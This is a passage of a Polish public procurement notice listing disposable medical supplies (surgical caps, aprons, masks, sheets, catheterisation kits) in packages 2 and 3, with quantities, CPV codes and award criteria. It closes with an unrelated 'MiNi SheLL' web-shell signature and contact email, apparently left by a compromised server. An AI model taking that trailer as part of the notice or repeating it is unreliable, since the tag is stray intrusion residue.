<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są wyroby okreslone w pakiecie nr 2:
Czepek chirurgiczny wiązany (o kroju furażerki ,z włókniny intensywnie pochłaniającej pot,o gramaturze min. 26g/m2 wiązany na linki, górna część czepka wykonana z włókniny wysokoparoprzepuszczalnej perforowanej o gramaturze min. 26g/m2)- rozmiar L, pakowane w kartoniki po max.50 szt.,(oznaczone zgodnie z ustawą o wyrobach medycznych z dnia 20.04.2004r.)	szt	8 000 
Czepek chirurgiczny wiązany (o kroju furażerki, z włókniny intensywnie pochłaniającej pot,o gramaturze min. 26g/m2, górna część czepka wykonana z włókniny wysokoparoprzepuszczalnej perforowanej o gramaturze min.26g/m2, wiązany na linki ) rozmiar XL, pakowany w kartoniki po max. 50 szt, (oznaczone zgodnie z ustawą o wyrobach medycznych z dnia 20.04.2004r.	szt	2 000 
Czepek pielęgniarski z gumką, zielony (duży okrągły czepek wykonany z włókniny polipropylenowej o gramaturze min. 15g/m2, pakowany w kartoniki po max. 50 szt.,( oznaczone zgodnie z ustawą o wyrobach medycznych)	szt	10000
Fartuch foliowy z cienkiej, mocnej folii o grubości min. 0,028mm, w roli a 50szt, biały	rol	120
Fartuch higieniczny biały z włókniny polipropylenowej o gramaturze min. 30g/m2.	szt	500
Fartuch higieniczny biały z włókniny polipropylenowej o gramaturze min. 30g/m2 z gumką w mankietach rozmiar XL	szt	800
Fartuch higieniczny zielony z włókniny polipropylenowej o gramaturze min. 30g/m2	szt	1 000 
Fartuch uniwersalny z laminatu o gramaturze min. 40g/m2, nieprzemakalności min. 100 cm H2O, oraz wytrzymałości na rozerwanie min. 80kPa (jasnoniebieska folia, wzmocniony, wydłużony)	szt	50 
Maska chirurgiczna z osłonką na oczy	szt	200 
Maska chirurgiczna pełnobarierowa z wykonana z trzech warstw wysokiej jakości włóknin, warstwa twarzowa nie posiadająca mikrowłosków, wyposażona w sztywnik zapewniajacy łatwe dopasowanie się maski do kształtu twarzy, wiązana na troki o dł. min. 40 cm, barierowość maski min. 95% (udokumentowana wysoka filtracja bakteryjna maski),  pakowana w kartoniki po max. 50 szt.,oznaczona zgodnie z ustawą o wyrobach medycznych z dnia 20.04.2004r.	szt	18 000 
Myjka do mycia i smarowania 1 x użytku wykonana z nieprzemakalnego laminatu papierowo-foliowego o gramaturze min. 50g/m2.	szt	30 000 
Pokrycie na kozetkę niejałowe, nieprzemakale zielone lub niebieskie rola 50mbx50cm, wykonane z pulpy celulozowej o gramaturze min. 29g/m2 oraz filmu PE o grubości min. 0,016mm	rol	800 
Pokrowiec na przewody (teleskopowo złożony z taśmami do mocowania na końcówkach, sterylny, wykonany z mocnej przeźroczystej folii PE o grubości min. 0,05mm	szt	1 500 
Prześcieradło 80*210 nieprzemakalne, wykonane z chłonnego i mocnego laminatu o gramaturze min. 60 g/m2, dodatkowo wzmocnione niebieskimi nitkami co około 17mm	szt	18 000 
Prześcieradło 80*175 nieprzemakalne, wykonane z chłonnego i mocnego laminatu o gramaturze min. 60g/m2, dodatkowo wzmocnione niebieskimi nitkami co około 17mm	szt	2 000 
Majtki do kolonoskopii	szt	500 
Okrycie termiczne operacyjne wykonane z  folii metalizowanej	szt	1 000 
Pokrowiec na aparaturę (wykonane z mocnej, przeźroczystej foli PE o grubości min. 0,05mm, umożliwiający łatwe nałożenie na przyrząd)	szt	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 33.14.10.00-0, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są wyroby określne w pakiecie nr 3:
Pościel flizelinowa , niesterylna (poszewka, poszwa, preścieradło) Komplet pościeli jednorazowego użytku wykonany z włókniny TMS o gramaturze 35 g / m 2 składający się z powłoki 200 cmx 150 cm, powłoczki 90cmx75cm i prześcieradła 210cmxl50cm. Powłoczki zszyte szwem obrzucającym, powinny posiadać odpowiednie zakładki zabezpieczające przed wysunięciem kołdry lub poduszki i zszyte.	kpl	500 
Prześcieradło flizelinowe, z włókniny polipropylenowej, niesterylne, jednorazowe,  o gramaturze 35g/m2 w rozmiarze 200 cmx 150 cm	szt	800
Zestaw do cewnikowania zawierający: serwet ę z laminatu 39g/m2, niebieska ,50x50 cm- 1szt., rękawice lateksowe z wywiniętymi mankietami - 2 szt., serweta z laminatu 39g/m2, niebieska 50x50 cm z otworem6 cm i rzcięciem 1 szt, tupfer kula z gazy 17 nitkowej 20x20 cm -6 szt, pojemnik plastikowy , okragły 120 ml- 1 szt, pęseta plastikowa -1 szt, cenik Foley - 1 szt ( możliwośc zamówienia rozmiarów 16 lub 18 lub 20 lub 22), worek na mocz z zaworem2 l- 1 szt, strzykawka 10 ml- 1 szt, igła 12mm-1 szt, zestaw zapakowany w opakowanie typu twardy blister jednokomorowy, na opakowaniu centralna etykieta z dwiema nalepkami z numerem serii, datą ważności, nazwą producenta , służąca do wklejnia do dokumentacji, sterylizowany EO	kpl	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 33.14.10.00-0, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Koszt kredytowania - 10</li>
<li>3. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com